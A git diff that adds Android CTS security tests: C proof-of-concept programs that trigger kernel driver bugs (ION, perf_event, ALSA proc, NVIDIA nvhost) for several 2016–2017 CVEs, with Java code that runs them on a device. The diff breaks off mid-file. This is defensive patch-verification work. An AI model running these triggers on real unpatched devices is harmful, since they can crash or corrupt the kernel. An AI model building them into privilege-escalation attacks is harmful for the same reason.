+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+ ION_HEAP_TYPE_SYSTEM,
+ ION_HEAP_TYPE_SYSTEM_CONTIG,
+ ION_HEAP_TYPE_CARVEOUT,
+ ION_HEAP_TYPE_CHUNK,
+ ION_HEAP_TYPE_DMA,
+ ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+ are at the end of this enum */
+ ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+ size_t len;
+ size_t align;
+ unsigned int heap_id_mask;
+ unsigned int flags;
+ ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+ ion_user_handle_t handle;
+ int fd;
+};
+
+
+struct ion_handle_data {
+ ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+ unsigned int cmd;
+ unsigned long arg;
+};
+#define ION_IOC_MAGIC 'I'
+
+#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
+ struct ion_allocation_data)
+
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
+ cached, ion will do cache
+ maintenance when the buffer is
+ mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
+ at mmap time, if this is set
+ caches must be managed manually */
+
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+ char* dev_path = "/dev/ion";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void prepare_data() {
+ void* data = malloc(0x1000);
+
+ g_allocation = (struct ion_allocation_data*)data;
+
+ g_allocation->len = 0x1000;
+ g_allocation->align = 8;
+ g_allocation->heap_id_mask = 1 << 25;
+ g_allocation->flags = ION_FLAG_CACHED;
+ g_allocation->handle = -1;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+
+ g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+ ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+ ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ while (1) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ trigger_ion_free();
+ pthread_mutex_unlock(&mutex);
+ }
+
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ setup_privi_and_affinity(0, 1);
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ pthread_cond_signal(&cond);
+ usleep(100);
+ trigger_ion_alloc();
+ sleep(1);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+ /*
+ * Major type: hardware/software/tracepoint/etc.
+ */
+ __u32 type;
+
+ /*
+ * Size of the attr structure, for fwd/bwd compat.
+ */
+ __u32 size;
+
+ /*
+ * Type specific configuration information.
+ */
+ __u64 config;
+
+ union {
+ __u64 sample_period;
+ __u64 sample_freq;
+ };
+
+ __u64 sample_type;
+ __u64 read_format;
+
+ __u64 disabled : 1, /* off by default */
+ inherit : 1, /* children inherit it */
+ pinned : 1, /* must always be on PMU */
+ exclusive : 1, /* only group on PMU */
+ exclude_user : 1, /* don't count user */
+ exclude_kernel : 1, /* ditto kernel */
+ exclude_hv : 1, /* ditto hypervisor */
+ exclude_idle : 1, /* don't count when idle */
+ mmap : 1, /* include mmap data */
+ comm : 1, /* include comm data */
+ freq : 1, /* use freq, not period */
+ inherit_stat : 1, /* per task counts */
+ enable_on_exec : 1, /* next exec enables */
+ task : 1, /* trace fork/exit */
+ watermark : 1, /* wakeup_watermark */
+ /*
+ * precise_ip:
+ *
+ * 0 - SAMPLE_IP can have arbitrary skid
+ * 1 - SAMPLE_IP must have constant skid
+ * 2 - SAMPLE_IP requested to have 0 skid
+ * 3 - SAMPLE_IP must have 0 skid
+ *
+ * See also PERF_RECORD_MISC_EXACT_IP
+ */
+ precise_ip : 2, /* skid constraint */
+ mmap_data : 1, /* non-exec mmap data */
+ sample_id_all : 1, /* sample_type all events */
+
+ exclude_host : 1, /* don't count in host */
+ exclude_guest : 1, /* don't count in guest */
+
+ exclude_callchain_kernel : 1, /* exclude kernel callchains */
+ exclude_callchain_user : 1, /* exclude user callchains */
+ constraint_duplicate : 1,
+
+ __reserved_1 : 40;
+
+ union {
+ __u32 wakeup_events; /* wakeup every n events */
+ __u32 wakeup_watermark; /* bytes before wakeup */
+ };
+
+ __u32 bp_type;
+ union {
+ __u64 bp_addr;
+ __u64 config1; /* extension of config */
+ };
+ union {
+ __u64 bp_len;
+ __u64 config2; /* extension of config1 */
+ };
+ __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+ /*
+ * Defines set of user regs to dump on samples.
+ * See asm/perf_regs.h for details.
+ */
+ __u64 sample_regs_user;
+
+ /*
+ * Defines size of the user stack to dump on samples.
+ */
+ __u32 sample_stack_user;
+
+ /* Align to u64. */
+ __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+ printf("id=%d arg=%d\n",gettid(),arg);
+
+ int i;
+ struct perf_event_attr attr;
+
+ switch ((long)arg) {
+ case 0:
+ //#16123
+ printf("thread 0\n");
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 1;
+
+ group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+ -1, 0x1ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-group:");
+ }
+
+
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 5;
+
+ child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-child:");
+ }
+
+ created = 1;
+ break;
+ case 1:
+
+ while(!created){
+ sleep(1);
+ }
+
+ printf("thread 1\n");
+ close(group_fd[0]);
+
+ freed = 1;
+
+ break;
+ case 2:
+
+ printf("thread 2\n");
+
+ while(!freed){
+ sleep(1);
+ }
+
+ close(child_fd[0]);
+
+ finished = 1;
+
+ break;
+
+ }
+ return 0;
+}
+
+int poc() {
+ long i;
+ pthread_t th[5];
+ for (i = 0; i < 3; i++) {
+ pthread_create(&th[i], 0, thr, (void *)i);
+ usleep(10000);
+ }
+
+ while(!finished){
+ sleep(1);
+ }
+
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ unsigned int times;
+ times = 0;
+ printf("POC3\n");
+ printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+ fflush(stdout);
+
+ // while(1){
+ pid = fork();
+ if(pid){
+ int status;
+ int ret = waitpid(pid,&status,0);
+
+ printf("[%d]times.\r",times);
+ times++;
+ }else
+ return poc();
+ // }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+ memset(buf, 0xa0, sizeof(buf));
+
+ int fd = open("/proc/asound/version", O_RDWR);
+ if(fd != -1){
+ lseek(fd, 0x1234567800000000, SEEK_SET);
+ write(fd, buf, sizeof(buf));
+ }else{
+ perror("open error\n");
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define SZ_128K 0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+ __u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+ __u64 offset; /* in, byte address */
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+ __u32 flags; /* in */
+ __u32 padding; /* in */
+ union {
+ __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+ __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
+ } o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define GPUDEV "/dev/nvhost-gpu"
+#define ASDEV "/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvhost_as_bind_channel_args as_bind = { 0 };
+ struct nvhost_as_alloc_space_args alloc = {
+ .pages = 1,
+ .page_size = SZ_128K,
+ .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+ };
+ struct nvhost_as_free_space_args free_arg = {
+ .pages = 1,
+ .page_size = SZ_128K
+ };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1) {
+ ERR("[-] open %s failed", NVMAPDEV);
+ goto __cleanup;
+ }
+ gpu = open(GPUDEV, O_RDONLY);
+ if(gpu == -1) {
+ ERR("[-] open %s failed", GPUDEV);
+ goto __cleanup;
+ }
+ asgpu = open(ASDEV, O_RDONLY);
+ if(asgpu == -1) {
+ ERR("[-] open %s failed", ASDEV);
+ goto __cleanup;
+ }
+ // bind the channel
+ as_bind.channel_fd = gpu;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+ if(ret == -1) {
+ ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+ goto __cleanup;
+ } else {
+ //LOG("[+] ioctl OK, channel is bond");
+ }
+
+ #if 1
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret) {
+ ERR("[-] NVMAP_IOC_CREATE failed");
+ goto __cleanup;
+ }
+ #endif
+
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+ goto __cleanup;
+ }
+ free_arg.offset = alloc.o_a.offset;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+ goto __cleanup;
+ }
+
+__cleanup:
+ close(nvmap);
+ close(gpu);
+ close(asgpu);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java b/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java
index 0cbd1cc..f4ce1bd 100644
--- a/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java
+++ b/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java
@@ -73,6 +73,7 @@
"/dev/nvhost-prof-gpu",
"/dev/nvhost-vic",
"/dev/nvmap", // b/9088251
+ "/dev/pmsg0", // b/31857082
"/dev/ptmx", // b/9088251
"/dev/pvrsrvkm", // b/9108170
"/dev/pvr_sync",
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
public class AdbUtils {
@@ -39,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
@@ -51,17 +51,25 @@
* @param device device to be ran on
* @return the console output from the binary
*/
- public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
- String fullResourceName = pathToPoc;
- File pocFile = File.createTempFile("poc", "");
- try {
- pocFile = extractResource(fullResourceName, pocFile);
- device.pushFile(pocFile, "/data/local/tmp/poc");
- device.executeShellCommand("chmod +x /data/local/tmp/poc");
- return device.executeShellCommand("/data/local/tmp/poc");
- } finally {
- pocFile.delete();
- }
+ public static String runPoc(String pocName, ITestDevice device) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ return device.executeShellCommand("/data/local/tmp/" + pocName);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pathToPoc a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @return the console output from the binary
+ */
+ public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ String output = receiver.getOutput();
+ return output;
}
/**
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..d04ebea
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,107 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_10 extends SecurityTestCase {
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest
